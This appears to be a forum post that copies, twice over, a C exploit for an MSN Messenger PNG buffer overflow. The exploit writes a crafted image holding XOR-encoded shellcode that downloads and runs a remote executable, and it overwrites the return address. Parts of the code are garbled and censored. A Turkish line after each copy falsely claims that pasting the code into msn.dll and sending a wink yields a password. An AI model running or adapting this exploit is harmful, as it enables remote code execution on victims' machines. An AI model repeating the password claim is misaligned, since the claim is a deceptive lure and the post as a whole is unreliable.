('binary' encoding is not supported, stored as-is) /*
*
* MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit
* Bug discoveried by Core Security Technologies ( www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: www.xteknik.com
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include
#include
#include
#include
#ifdef __BORLandC__
#include
#endif
#define NOP 0x90
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\ x0D\ x 49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\ x00\ x 00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
/* Generic win32 http download sh*llcode
xored with 0x1d by delikon ( http://delikon.de/) */
char sh*llcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\ x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\ x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\ x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\ x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\ x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\ x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\ x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\ x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\ x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\ xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\ xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\ xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newsh*llcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;iName=Name^xor;
return Name;
}
**** main(int argc, char *argv[])
{
if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies ( www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca_at_icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit \n");
printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb" == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;ifputc(png_header,di);
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(sh*llcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newsh*llcode = new char[sizeof(sh*llcode)+strlen(web)+1];
strcpy(newsh*llcode,sh*llcode);
strcat(newsh*llcode,Sifrele(web));
strcat(newsh*llcode,"\x1d");
//sh*ll code
for(i=0;ifputc(newsh*llcode,di);
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);
/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);
for(i=0;ifputc(pngeof,di);
printf("Vulnarable png file %s has been generated!\n",argv[1]);
fclose(di);
}
bu kodları msn kurulu olduğu klasörün içinde msn.dll dosyasının en altına yazın ve kaydedin sonra msn den bi göz kırpması yollayın tamamdır şifre gelecek..
[EMAIL="Th€_ßy_P@Ş
*
* MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit
* Bug discoveried by Core Security Technologies ( www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: www.xteknik.com
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include
#include
#include
#include
#ifdef __BORLandC__
#include
#endif
#define NOP 0x90
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\ x0D\ x 49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\ x00\ x 00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
/* Generic win32 http download sh*llcode
xored with 0x1d by delikon ( http://delikon.de/) */
char sh*llcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\ x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\ x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\ x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\ x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\ x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\ x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\ x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\ x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\ x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\ xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\ xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\ xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newsh*llcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;iName=Name^xor;
return Name;
}
**** main(int argc, char *argv[])
{
if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies ( www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca_at_icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit \n");
printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb" == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;ifputc(png_header,di);
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(sh*llcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newsh*llcode = new char[sizeof(sh*llcode)+strlen(web)+1];
strcpy(newsh*llcode,sh*llcode);
strcat(newsh*llcode,Sifrele(web));
strcat(newsh*llcode,"\x1d");
//sh*ll code
for(i=0;ifputc(newsh*llcode,di);
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);
/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);
for(i=0;ifputc(pngeof,di);
printf("Vulnarable png file %s has been generated!\n",argv[1]);
fclose(di);
}
bu kodları msn kurulu olduğu klasörün içinde msn.dll dosyasının en altına yazın ve kaydedin sonra msn den bi göz kırpması yollayın tamamdır şifre gelecek..
[EMAIL="Th€_ßy_P@Ş
...
